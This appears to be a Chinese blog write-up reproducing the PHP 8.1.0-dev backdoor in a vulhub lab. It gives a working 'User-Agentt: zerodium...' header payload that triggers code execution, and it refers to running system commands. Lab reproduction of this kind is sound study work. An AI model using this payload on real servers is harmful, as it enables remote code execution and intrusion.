vulhub 8.1-backdoor漏洞复现

2021年3月28日,PHP 8.1.0-dev 版本被发现存在后门,允许攻击者通过User-Agent头执行任意代码。此漏洞允许恶意用户利用特定payload执行系统命令,威胁服务器安全。环境复现后,通过构造User-Agentt标头即可触发该漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

PHP版本8.1.0-dev于2021年3月28日植入了后门,但很快发现并删除了该后门。当服务器上存在此后门时,攻击者可以通过发送User-Agentt标头执行任意代码。

复现

用vulhub搭好环境后
在请求头中构造如下payload

User-Agentt: zerodiumvar_dump(233*233);

在这里插入图片描述
执行系统命令:
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值